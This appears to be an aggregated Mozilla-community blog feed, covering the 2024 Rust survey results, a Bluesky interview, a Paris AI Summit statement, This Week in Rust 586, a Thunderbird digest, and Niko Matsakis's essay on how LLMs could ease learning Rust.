<noscript> <img alt="how-is-rust-used-at-your-organization" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/how-is-rust-used-at-your-organization.png" /> </noscript>
[PNG] [SVG]

Once again, the top reason employers of our survey respondents invested in Rust was the ability to build relatively correct and bug-free software. The second most popular reason was Rust’s performance characteristics. 21% of respondents that use Rust at work do so because they already know it, and it's thus their default choice, an uptick of 5pp from 2023. This seems to suggest that Rust is becoming one of the baseline languages of choice for more and more companies.

<noscript> <img alt="why-you-use-rust-at-work" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/why-you-use-rust-at-work.png" /> </noscript>
[PNG] [SVG]

Similarly to the previous year, a large percentage of respondents (82%) report that Rust helped their company achieve its goals. In general, it seems that programmers and companies are quite happy with their usage of Rust, which is great!

<noscript> <img alt="which-statements-apply-to-rust-at-work" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-statements-apply-to-rust-at-work.png" /> </noscript>
[PNG] [SVG]

In terms of technology domains, the situation is quite similar to the previous year. Rust seems to be especially popular for creating server backends, web and networking services and cloud technologies. It also seems to be gaining more traction for embedded use-cases.

<noscript> <img alt="technology-domain" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/technology-domain.png" /> </noscript>

You can scroll the chart to the right to see more domains. Note that the Automotive domain was not offered as a closed answer in the 2023 survey (it was merely entered through open answers), which might explain the large jump.

It is exciting to see the continued growth of professional Rust usage and the confidence so many users feel in its performance, control, security and safety, enjoyability, and more!

Challenges

As always, one of the main goals of the State of Rust survey is to shed light on challenges, concerns, and priorities on Rustaceans’ minds over the past year.

We have asked our users about aspects of Rust that limit their productivity. Perhaps unsurprisingly, slow compilation was at the top of the list, as it seems to be a perennial concern of Rust users. As always, there are efforts underway to improve the speed of the compiler, such as enabling the parallel frontend or switching to a faster linker by default. We invite you to test these improvements and let us know if you encounter any issues.

Other challenges included subpar support for debugging Rust and high disk usage of Rust compiler artifacts. On the other hand, most Rust users seem to be very happy with its runtime performance, the correctness and stability of the compiler and also Rust's documentation.

<noscript> <img alt="which-problems-limit-your-productivity" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-problems-limit-your-productivity.png" /> </noscript>

In terms of specific unstable (or missing) features that Rust users want to be stabilized (or implemented), the most desired ones were async closures and if/let while chains. Well, we have good news! Async closures will be stabilized in the next version of Rust (1.85), and if/let while chains will hopefully follow soon after, once Edition 2024 is released (which will also happen in Rust 1.85).

Other coveted features are generators (both sync and async) and more powerful generic const expressions. You can follow the Rust Project Goals to track the progress of these (and other) features.

<noscript> <img alt="which-features-do-you-want-stabilized" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-features-do-you-want-stabilized.png" /> </noscript>

In the open answers to this question, people were really helpful and tried hard to describe the most notable issues limiting their productivity. We have seen mentions of struggles with async programming (an all-time favourite), debuggability of errors (which people generally love, but they are not perfect for everyone) or Rust tooling being slow or resource intensive (rust-analyzer and rustfmt). Some users also want a better IDE story and improved interoperability with other languages.

This year, we have also included a new question about the speed of Rust's evolution. While most people seem to be content with the status quo, more than a quarter of people who responded to this question would like Rust to stabilize and/or add features more quickly, and only 7% of respondents would prefer Rust to slow down or completely stop adding new features.

<noscript> <img alt="what-do-you-think-about-rust-evolution" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-do-you-think-about-rust-evolution.png" /> </noscript>
[PNG] [SVG]

Interestingly, when we asked respondents about their main worries for the future of Rust, one of the top answers remained the worry that Rust will become too complex. This seems to be in contrast with the answers to the previous question. Perhaps Rust users still seem to consider the complexity of Rust to be manageable, but they worry that one day it might become too much.

We are happy to see that the amount of respondents concerned about Rust Project governance and lacking support of the Rust Foundation has dropped by about 6pp from 2023.

<noscript> <img alt="what-are-your-biggest-worries-about-rust" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-are-your-biggest-worries-about-rust.png" /> </noscript>

Looking ahead

Each year, the results of the State of Rust survey help reveal the areas that need improvement in many areas across the Rust Project and ecosystem, as well as the aspects that are working well for our community.

If you have any suggestions for the Rust Annual survey, please let us know!

We are immensely grateful to those who participated in the 2024 State of Rust Survey and facilitated its creation. While there are always challenges associated with developing and maintaining a programming language, this year we were pleased to see a high level of survey participation and candid feedback that will truly help us make Rust work better for everyone.

If you’d like to dig into more details, we recommend you to browse through the full survey report.

Andrew HalberstadtUsing Jujutsu With Mozilla Unified

With Mozilla’s migration from hg.mozilla.org to Github drawing near, the clock is ticking for developers still using Mercurial to find their new workflow. I previously blogged about how Jujutsu can help here, so please check that post out first if you aren’t sure what Jujutsu is, or whether it’s right for you. If you know you want to give it a shot, read on for a tutorial on how to get everything set up!

We’ll start with an existing Mercurial clone of mozilla-unified, convert it to use git-cinnabar and then set up Jujutsu using the co-located repo method. Finally I’ll cover some tips and tricks for using some of the tooling that relies on version control.

The Mozilla BlogBluesky’s Emily Liu on rethinking social media (and why it’s time to chime in)

A smiling woman in a brown jacket stands on a busy city street, overlaid with a blue digital grid background and speech bubble icons.<figcaption class="wp-element-caption">Emily Liu is the head of special projects at Bluesky.</figcaption>

Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and how they would design their own corner of the web.

We caught up with Emily Liu, head of special projects at Bluesky, as the open-source platform celebrates its first year launching to the public (you can follow Firefox on Bluesky here). She talks about how social media has changed over the last decade, her love for public forums and how her path started with a glitter cursor. 

What is your favorite corner of the internet? 

I’m at the two extremes on the spectrum of private to public content: 

Firstly, I love a good iMessage group text, especially when it’s moving at 100 miles per hour. I strongly believe that everyone needs a good group chat.

At the same time, I love public web forums. This feels like something that’s increasingly rare on the internet as more of us move to private group apps, and I worry that this is equivalent to pulling the ladder up behind us for those who haven’t found those private spaces yet. So I try to do my part by chiming in on public forums when I can offer something useful.

What is the one tab you always regret closing?

I live by Google Calendar and have widgets for it on probably every digital surface — my desktop, my phone lock screen, my laptop side menu, and of course, multiple tabs simultaneously. If something’s not on my calendar, it’s probably not happening.

What can you not stop talking about on the internet right now?

I’m super excited about Bluesky. Obviously I’m unbiased (I work here). We launched the Bluesky app publicly in just February 2024, and under a year later, we crossed 30M people on the network. But the real measure of Bluesky’s growth is that my family has started sending me news articles and asking, “Hey, isn’t this where you work?”

Social networks have become vital public infrastructure, whether it’s to get the latest breaking news, find jobs and opportunities, or stay in touch with our friends and family. Yet over the last decade, closed networks have locked users in, preventing competition and innovation in social media as their services deteriorate. On the other hand, Bluesky is both a social app where your experience online is yours to customize, and an open network that reintroduces competition to social media. This also means that the social network isn’t defined by whoever the CEO is, however capricious they might be.

What was the first online community you engaged with?

In middle school, I ran an anonymous fashion blog on Tumblr. This was before Tumblr had group chats, so internet friends and I co-opted the product by creating a makeshift group DM — a private blog with multiple owners, where every message we sent was really just a post on a private blog. Where there is a will, there is a way, and people are infinitely creative; this is where I learned that the product you design may not be the product that users adopt.

Tumblr was also where I wrote my first lines of code out of desperation for a better blog theme than what the default marketplace provided. Who would’ve thought that adding a visitor counter and a glitter cursor would’ve led me to this point!

If you could create your own corner of the internet, what would it look like?

I feel lucky that in a sense, I am doing this right now through Bluesky. On one hand, there’s the Bluesky app itself. There’s still a bunch of low-hanging fruit to reach feature parity with other social networks, but on top of that, I’m excited about tweaks that might make social media less of a “torment nexus” that other apps haven’t tried yet. Maybe I shouldn’t share them here just yet since I know a certain other company likes to implement Bluesky’s ideas. 😉

And on the other hand, Bluesky is already so customizable that I can configure my experience to be what I want. For example, I’m a big fan of the Quiet Posters custom feed, which shows you posts from people you follow who don’t often post that much, giving you a cozier feel of the network.

What articles and/or videos are you waiting to read/watch right now?

I have so many open tabs and unread newsletters about China and AI that I need to get to.

What role do you see open web projects like Bluesky playing in shaping the future of the web?

I see Bluesky as just one contributor in the mission of building an open web — we’re not the first project to build an open social network, and we won’t be the last. The collaboration and constructive criticism from other players has been immensely useful. Recently, some independent groups have begun building alternative ATProto infrastructure, which I’m particularly excited about. (ATProto, or the AT Protocol, is the open standard that Bluesky is built upon.) Bluesky’s vision of a decentralized and open social web only comes to fruition when users actually have alternatives to choose from, so I’m rooting for all of these projects too.


Emily Liu is the head of special projects at Bluesky, an open social network that gives creators independence from platforms, developers the freedom to build, and users a choice in their experience. Previously, Emily built election models and visualizations at The Washington Post, archival tooling at The New York Times, and automated fact-checking at the Duke Reporters’ Lab.

The post Bluesky’s Emily Liu on rethinking social media (and why it’s time to chime in) appeared first on The Mozilla Blog.

The Mozilla BlogParis AI Action Summit: A milestone for open and Public AI

As we close out the Paris AI Action Summit, one thing is clear: the conversation around open and Public AI is evolving—and gaining real momentum. Just over a year ago at Bletchley Park, open source AI was framed as a risk. In Paris, we saw a major shift. There is now a growing recognition that openness isn’t just compatible with AI safety and advancing public interest AI—it’s essential to it.

We have been vocal supporters of an ecosystem grounded in open competition and trustworthy AI —one where innovation isn’t walled off by dominant players or concentrated in a single geography. Mozilla, therefore, came to this Summit with a clear and urgent message: AI must be open, human-centered, and built for the public good. And across discussions, that message resonated.

Open source AI is entering the conversation in a big way

Two particularly notable moments stood out:

  • European Commission President Ursula von der Leyen spoke about Europe’s “distinctive approach to AI,” emphasizing collaborative, open-source solutions as a path forward.
  • India’s Prime Minister Narendra Modi reinforced this vision, calling for open source AI systems to enhance trust and transparency, reduce bias, and democratize technology.

These aren’t just words. The investments and initiatives announced at this Summit mark a real turning point. From the launch of Current AI, an initial $400M public interest AI partnership supporting open source development, to ROOST, a new nonprofit making AI safety tools open and accessible, to the €109 billion investment in AI computing infrastructure announced by President Macron, the momentum is clear. Add to that strong signals from the EU and India, and this Summit stands out as one of the most positive and proactive international gatherings on AI so far.

At the heart of this is Public AI—the idea that we need infrastructure beyond private, purely profit-driven AI. That means building AI that serves society and promotes true innovation even when it doesn’t fit neatly into short-term business incentives. The conversations in Paris show that we’re making progress, but there’s more work to do.

Looking ahead to the next AI summit

Momentum is building, and we must forge onward. The next AI Summit in India will be a critical moment to review the progress on these announcements and ensure organizations like Mozilla—those fighting for open and Public AI infrastructure—have a seat at the table.

Mozilla is committed to turning this vision into reality—no longer a distant, abstract idea, but a movement already in motion.

A huge thanks to the organizers, partners, and global leaders driving this conversation forward. Let’s keep pushing for AI that serves humanity—not the other way around.

––Mitchell Baker
Chairwoman, Mozilla
Paris AI Action Summit Steering Committee Member

The post Paris AI Action Summit: A milestone for open and Public AI appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 586

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
FOSDEM
Miscellaneous

Crate of the Week

This week's crate is esp32-mender-client, a client for ESP32 to execute firmware updates and remote commands.

Thanks to Kelvin for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No Calls for participation were submitted this week.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

462 pull requests were merged in the last week

Rust Compiler Performance Triage

A relatively neutral week, with lots of real changes but most small in magnitude. Most significant change is rustdoc's move of JS/CSS minification to build time which cut doc generation times on most benchmarks fairly significantly.

Triage done by @simulacrum. Revision range: 01e4f19c..c03c38d5

3 Regressions, 5 Improvements, 1 Mixed; 2 of them in rollups 32 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-12 - 2025-03-12 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Just because things are useful doesn't mean they are magically sound.

Ralf Jung on github

Thanks to scottmcm for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Mozilla ThunderbirdThunderbird Monthly Development Digest – January 2025

Hello again Thunderbird Community! As January drew to a close, the team was closing in on the completion of some important milestones. Additionally, we had scoped work for our main Q1 priorities. Those efforts are now underway and it feels great to cross things off the list and start tackling new challenges.

As always, you can catch up on all of our previous digests and updates.

FOSDEM – Inspiration, collaboration and education

A modest contingent from the Thunderbird team joined our Mozilla counterparts for an educational and inspiring weekend at Fosdem recently. We talked about standards, problems, solutions and everything in between. However, the most satisfying part of the weekend being standing at the Thunderbird booth and hearing the gratitude, suggestions and support from so many users.

With such important discussions among leading voices, we’re keen to help in finding or implementing solutions to some of the meatier topics such as:

  • OAuth 2.0 Dynamic Client Registration Protocol
  • Support for unicode email addresses
  • Support for OpenPGP certification authorities and trust delegation

Exchange Web Services support in Rust

With a reduction in team capacity for part of January, the team was able to complete work on the following tasks that form some of the final stages in our 0.2 release:

  • Folder compaction
  • Saving attachments to disk
  • Download EWS messages in an nsIChannel

Keep track of feature delivery here.

Account Hub

We completed the second and final milestone in the First Time User Experience for email configuration via the enhanced Account Hub over the course of January. Tasks included density and font awareness, refactoring of state management, OAuth prompts, enhanced error handling and more which can be followed via Meta bug & progress tracking. Watch out for this feature being unveiled in daily and beta in the coming weeks!

Global Message Database

With a significant number of the research and prototyping tasks now behind us, the project has taken shape over the course of January with milestones and tasks mapped out. Recent progress has been related to live view, sorting and support for Unicode server and folder names. 

Next up is to finally crack the problem of “non-unique unique IDs” mentioned previously, which is important preparatory groundwork required for a clean database migration. 

In-App Notifications

Phase 2 is now complete, and almost ready for uplift to ESR, pending underlying Firefox dependencies scheduled in early March. Features and user stories in the latest milestone include a cache-control mechanism, a thorough accessibility review, schema changes and the addition of guard rails to limit notification frequency. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

To see things as they land, and help squash early bugs, you can check the pushlog and try running daily. This would be immensely helpful for catching things early.

Toby Pilling
Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – January 2025 appeared first on The Thunderbird Blog.

Niko MatsakisHow I learned to stop worrying and love the LLM

I believe that AI-powered development tools can be a game changer for Rust—and vice versa. At its core, my argument is simple: AI’s ability to explain and diagnose problems with rich context can help people get over the initial bump of learning Rust in a way that canned diagnostics never could, no matter how hard we try. At the same time, rich type systems like Rust’s give AIs a lot to work with, which could be used to help them avoid hallucinations and validate their output. This post elaborates on this premise and sketches out some of the places where I think AI could be a powerful boost.

Perceived learning curve is challenge #1 for Rust

Is Rust good for every project? No, of course not. But it’s absolutely great for some things—specifically, building reliable, robust software that performs well at scale. This is no accident. Rust’s design is intended to surface important design questions (often in the form of type errors) and to give users the control to fix them in whatever way is best.

But this same strength is also Rust’s biggest challenge. Talking to people within Amazon about adopting Rust, perceived complexity and fear of its learning curve is the biggest hurdle. Most people will say, “Rust seems interesting, but I don’t need it for this problem”. And you know, they’re right! They don’t need it. But that doesn’t mean they wouldn’t benefit from it.

One of Rust’s big surprises is that, once you get used to it, it’s “surprisingly decent” at very large number of things beyond what it was designed for. Simple business logic and scripts can be very pleasant in Rust. But the phase “once you get used to it” in that sentence is key, since most people’s initial experience with Rust is confusion and frustration.

Rust likes to tell you no (but it’s for your own good)

Some languages are geared to say yes—that is, given any program, they aim to run it and do something. JavaScript is of course the most extreme example (no semicolons? no problem!) but every language does this to some degree. It’s often quite elegant. Consider how, in Python, you write vec[-1] to get the last element in the list: super handy!

Rust is not (usually) like this. Rust is geared to say no. The compiler is just itching for a reason to reject your program. It’s not that Rust is mean: Rust just wants your program to be as good as it can be. So we try to make sure that your program will do what you want (and not just what you asked for). This is why vec[-1], in Rust, will panic: sure, giving you the last element might be convenient, but how do we know you didn’t have an off-by-one bug that resulted in that negative index?1

But that tendency to say no means that early learning can be pretty frustrating. For most people, the reward from programming comes from seeing their program run—and with Rust, there’s a lot of niggling details to get right before your program will run. What’s worse, while those details are often motivated by deep properties of your program (like data races), the way they are presented is as the violation of obscure rules, and the solution (“add a *”) can feel random.

Once you get the hang of it, Rust feels great, but getting there can be a pain. I heard a great phrase from someone at Amazon to describe this: “Rust: the language where you get the hangover first”.3

AI today helps soften the learning curve

My favorite thing about working at Amazon is getting the chance to talk to developers early in their Rust journey. Lately I’ve noticed an increasing trend—most are using Q Developer. Over the last year, Amazon has been doing a lot of internal promotion of Q Developer, so that in and of itself is no surprise, but what did surprise me a bit is hearing from developers the way that they use it.

For most of them, the most valuable part of Q Dev is authoring code but rather explaining it. They ask it questions like “why does this function take an &T and not an Arc<T>?” or “what happens when I move a value from one place to another?”. Effectively, the LLM becomes an ever-present, ever-patient teacher.4

Scaling up the Rust expert

Some time back I sat down with an engineer learning Rust at Amazon. They asked me about an error they were getting that they didn’t understand. “The compiler is telling me something about ‘static, what does that mean?” Their code looked something like this:

async fn log_request_in_background(message: &str) {
    tokio::spawn(async move {
        log_request(message);
    });
}

And the compiler was telling them:

error[E0521]: borrowed data escapes outside of function
 --> src/lib.rs:2:5
  |
1 |   async fn log_request_in_background(message: &str) {
  |                                      -------  - let's call the lifetime of this reference `'1`
  |                                      |
  |                                      `message` is a reference that is only valid in the function body
2 | /     tokio::spawn(async move {
3 | |         log_request(message);
4 | |     });
  | |      ^
  | |      |
  | |______`message` escapes the function body here
  |        argument requires that `'1` must outlive `'static`

This is a pretty good error message! And yet it requires significant context to understand it (not to mention scrolling horizontally, sheesh). For example, what is “borrowed data”? What does it mean for said data to “escape”? What is a “lifetime” and what does it mean that “'1 must outlive 'static”? Even assuming you get the basic point of the message, what should you do about it?

The fix is easy… if you know what to do

Ultimately, the answer to the engineer’s problem was just to insert a call to clone5. But deciding on that fix requires a surprisingly large amount of context. In order to figure out the right next step, I first explained to the engineer that this confusing error is, in fact, what it feels like when Rust saves your bacon, and talked them through how the ownership model works and what it means to free memory. We then discussed why they were spawning a task in the first place (the answer: to avoid the latency of logging)—after all, the right fix might be to just not spawn at all, or to use something like rayon to block the function until the work is done.

Once we established that the task needed to run asynchronously from its parent, and hence had to own the data, we looked into changing the log_request_in_background function to take an Arc<String> so that it could avoid a deep clone. This would be more efficient, but only if the caller themselves could cache the Arc<String> somewhere. It turned out that the origin of this string was in another team’s code and that this code only returned an &str. Refactoring that code would probably be the best long term fix, but given that the strings were expected to be quite short, we opted to just clone the string.

You can learn a lot from a Rust error

An error message is often your first and best chance to teach somebody something.—Esteban Küber (paraphrased)

Working through this error was valuable. It gave me a chance to teach this engineer a number of concepts. I think it demonstrates a bit of Rust’s promise—the idea that learning Rust will make you a better programmer overall, regardless of whether you are using Rust or not.

Despite all the work we have put into our compiler error messages, this kind of detailed discussion is clearly something that we could never achieve. It’s not because we don’t want to! The original concept for --explain, for example, was to present a customized explanation of each error was tailored to the user’s code. But we could never figure out how to implement that.

And yet tailored, in-depth explanation is absolutely something an LLM could do. In fact, it’s something they already do, at least some of the time—though in my experience the existing code assistants don’t do nearly as good a job with Rust as they could.

What makes a good AI opportunity?

Emery Berger is a professor at UMass Amherst who has been exploring how LLMs can improve the software development experience. Emery emphasizes how AI can help close the gap from “tool to goal”. In short, today’s tools (error messages, debuggers, profilers) tell us things about our program, but they stop there. Except in simple cases, they can’t help us figure out what to do about it—and this is where AI comes in.

When I say AI, I am not talking (just) about chatbots. I am talking about programs that weave LLMs into the process, using them to make heuristic choices or proffer explanations and guidance to the user. Modern LLMs can also do more than just rely on their training and the prompt: they can be given access to APIs that let them query and get up-to-date data.

I think AI will be most useful in cases where solving the problem requires external context not available within the program itself. Think back to my explanation of the 'static error, where knowing the right answer depended on how easy/hard it would be to change other APIs.

Where I think Rust should leverage AI

I’ve thought about a lot of places I think AI could help make working in Rust more pleasant. Here is a selection.

Deciding whether to change the function body or its signature

Consider this code:

fn get_first_name(&self, alias: &str) -> &str {
    alias
}

This function will give a type error, because the signature (thanks to lifetime elision) promises to return a string borrowed from self but actually returns a string borrowed from alias. Now…what is the right fix? It’s very hard to tell in isolation! It may be that in fact the code was meant to be &self.name (in which case the current signature is correct). Or perhaps it was meant to be something that sometimes returns &self.name and sometimes returns alias, in which case the signature of the function was wrong. Today, we take our best guess. But AI could help us offer more nuanced guidance.

Translating idioms from one language to another

People often ask me questions like “how do I make a visitor in Rust?” The answer, of course, is “it depends on what you are trying to do”. Much of the time, a Java visitor is better implemented as a Rust enum and match statements, but there is a time and a place for something more like a visitor. Guiding folks through the decision tree for how to do non-trivial mappings is a great place for LLMs.

Figuring out the right type structure

When I start writing a Rust program, I start by authoring type declarations. As I do this, I tend to think ahead to how I expect the data to be accessed. Am I going to need to iterate over one data structure while writing to another? Will I want to move this data to another thread? The setup of my structures will depend on the answer to these questions.

I think a lot of the frustration beginners feel comes from not having a “feel” yet for the right way to structure their programs. The structure they would use in Java or some other language often won’t work in Rust.

I think an LLM-based assistant could help here by asking them some questions about the kinds of data they need and how it will be accessed. Based on this it could generate type definitions, or alter the definitions that exist.

Complex refactorings like splitting structs

A follow-on to the previous point is that, in Rust, when your data access patterns change as a result of refactorings, it often means you need to do more wholesale updates to your code.6 A common example for me is that I want to split out some of the fields of a struct into a substruct, so that they can be borrowed separately.7 This can be quite non-local and sometimes involves some heuristic choices, like “should I move this method to be defined on the new substruct or keep it where it is?”.

Migrating consumers over a breaking change

When you run the cargo fix command today it will automatically apply various code suggestions to cleanup your code. With the upcoming Rust 2024 edition, cargo fix---edition will do the same but for edition-related changes. All of the logic for these changes is hardcoded in the compiler and it can get a bit tricky.

For editions, we intentionally limit ourselves to local changes, so the coding for these migrations is usually not too bad, but there are some edge cases where it’d be really useful to have heuristics. For example, one of the changes we are making in Rust 2024 affects “temporary lifetimes”. It can affect when destructors run. This almost never matters (your vector will get freed a bit earlier or whatever) but it can matter quite a bit, if the destructor happens to be a lock guard or something with side effects. In practice when I as a human work with changes like this, I can usually tell at a glance whether something is likely to be a problem—but the heuristics I use to make that judgment are a combination of knowing the name of the types involved, knowing something about the way the program works, and perhaps skimming the destructor code itself. We could hand-code these heuristics, but an LLM could do it and better, and if could ask questions if it was feeling unsure.

Now imagine you are releasing the 2.x version of your library. Maybe your API has changed in significant ways. Maybe one API call has been broken into two, and the right one to use depends a bit on what you are trying to do. Well, an LLM can help here, just like it can help in translating idioms from Java to Rust.

I imagine the idea of having an LLM help you migrate makes some folks uncomfortable. I get that. There’s no reason it has to be mandatory—I expect we could always have a more limited, precise migration available.8

Optimize your Rust code to eliminate hot spots

Premature optimization is the root of all evil, or so Donald Knuth is said to have said. I’m not sure about all evil, but I have definitely seen people rathole on microoptimizing a piece of code before they know if it’s even expensive (or, for that matter, correct). This is doubly true in Rust, where cloning a small data structure (or reference counting it) can often make your life a lot simpler. Llogiq’s great talks on Easy Mode Rust make exactly this point. But here’s a question, suppose you’ve been taking this advice to heart, inserting clones and the like, and you find that your program is running kind of slow? How do you make it faster? Or, even worse, suppose that you are trying to turn our network service. You are looking at the blizzard of available metrics and trying to figure out what changes to make. What do you do? To get some idea of what is possible, check out Scalene, a Python profiler that is also able to offer suggestions as well (from Emery Berger’s group at UMass, the professor I talked about earlier).

Diagnose and explain miri and sanitizer errors

Let’s look a bit to the future. I want us to get to a place where the “minimum bar” for writing unsafe code is that you test that unsafe code with some kind of sanitizer that checks for both C and Rust UB—something like miri today, except one that works “at scale” for code that invokes FFI or does other arbitrary things. I expect a smaller set of people will go further, leveraging automated reasoning tools like Kani or Verus to prove statically that their unsafe code is correct9.

From my experience using miri today, I can tell you two things. (1) Every bit of unsafe code I write has some trivial bug or other. (2) If you enjoy puzzling out the occasionally inscrutable error messages you get from Rust, you’re gonna love miri! To be fair, miri has a much harder job—the (still experimental) rules that govern Rust aliasing are intended to be flexible enough to allow all the things people want to do that the borrow checker doesn’t permit. This means they are much more complex. It also means that explaining why you violated them (or may violate them) is that much more complicated.

Just as an AI can help novices understand the borrow checker, it can help advanced Rustaceans understand tree borrows (or whatever aliasing model we wind up adopting). And just as it can make smarter suggestions for whether to modify the function body or its signature, it can likely help you puzzle out a good fix.

Rust’s emphasis on “reliability” makes it a great target for AI

Anyone who has used an LLM-based tool has encountered hallucinations, where the AI just makes up APIs that “seem like they ought to exist”.10 And yet anyone who has used Rust knows that “if it compiles, it works” is true may more often than it has a right to be.11 This suggests to me that any attempt to use the Rust compiler to validate AI-generated code or solutions is going to also help ensure that the code is correct.

AI-based code assistants right now don’t really have this property. I’ve noticed that I kind of have to pick between “shallow but correct” or “deep but hallucinating”. A good example is match statements. I can use rust-analyzer to fill in the match arms and it will do a perfect job, but the body of each arm is todo!. Or I can let the LLM fill them in and it tends to cover most-but-not-all of the arms but it generates bodies. I would love to see us doing deeper integration, so that the tool is talking to the compiler to get perfect answers to questions like “what variants does this enum have” while leveraging the LLM for open-ended questions like “what is the body of this arm”.12

Conclusion

Overall AI reminds me a lot of the web around the year 2000. It’s clearly overhyped. It’s clearly being used for all kinds of things where it is not needed. And it’s clearly going to change everything.

If you want to see examples of what is possible, take a look at the ChatDBG videos published by Emery Berger’s group. You can see how the AI sends commands to the debugger to explore the program state before explaining the root cause. I love the video debugging bootstrap.py, as it shows the AI applying domain knowledge about statistics to debug and explain the problem.

My expectation is that compilers of the future will not contain nearly so much code geared around authoring diagnostics. They’ll present the basic error, sure, but for more detailed explanations they’ll turn to AI. It won’t be just a plain old foundation model, they’ll use RAG techniques and APIs to let the AI query the compiler state, digest what it finds, and explain it to users. Like a good human tutor, the AI will tailor its explanations to the user, leveraging the user’s past experience and intuitions (oh, and in the user’s chosen language).

I am aware that AI has some serious downsides. The most serious to me is its prodigous energy use, but there are also good questions to be asked about the way that training works and the possibility of not respecting licenses. The issues are real but avoiding AI is not the way to solve them. Just in the course of writing this post, DeepSeek was announced, demonstrating that there is a lot of potential to lower the costs of training. As far as the ethics and legality, that is a very complex space. Agents are already doing a lot to get better there, but note also that most of the applications I am excited about do not involve writing code so much as helping people understand and alter the code they’ve written.


  1. We don’t always get this right. For example, I find the zip combinator of iterators annoying because it takes the shortest of the two iterators, which is occasionally nice but far more often hides bugs. ↩︎

  2. The irony, of course, is that AI can help you to improve your woeful lack of tests by auto-generating them based on code coverage and current behavior. ↩︎

  3. I think they told me they heard it somewhere on the internet? Not sure the original source. ↩︎

  4. Personally, the thing I find most annoying about LLMs is the way they are trained to respond like groveling serveants. “Oh, that’s a good idea! Let me help you with that” or “I’m sorry, you’re right I did make a mistake, here is a version that is better”. Come on, I don’t need flattery. The idea is fine but I’m aware it’s not earth-shattering. Just help me already. ↩︎

  5. Inserting a call to clone is actually a bit more subtle than you might think, given the interaction of the async future here. ↩︎

  6. Garbage Collection allows you to make all kinds of refactorings in ownership structure without changing your interface at all. This is convenient, but—as we discussed early on—it can hide bugs. Overall I prefer having that information be explicit in the interface, but that comes with the downside that changes have to be refactored. ↩︎

  7. I also think we should add a feature like View Types to make this less necessary. In this case instead of refactoring the type structure, AI could help by generating the correct type annotations, which might be non-obvious. ↩︎

  8. My hot take here is that if the idea of an LLM doing migrations in your code makes you uncomfortable, you are likely (a) overestimating the quality of your code and (b) underinvesting in tests and QA infrastructure2. I tend to view an LLM like a “inconsistently talented contributor”, and I am perfectly happy having contributors hack away on projects I own. ↩︎

  9. The student asks, “When unsafe code is proven free of UB, does that make it safe?” The master says, “Yes.” The student asks, “And is it then still unsafe?” The master says, “Yes.” Then, a minute later, “Well, sort of.” (We may need new vocabulary.) ↩︎

  10. My personal favorite story of this is when I asked ChatGPT to generate me a list of “real words and their true definition along with 2 or 3 humorous fake definitions” for use in a birthday party game. I told it that “I know you like to hallucinate so please include links where I can verify the real definition”. It generated a great list of words along with plausible looking URLs for merriamwebster.com and so forth—but when I clicked the URLs, they turned out to all be 404s (the words, it turned out, were real—just not the URLs). ↩︎

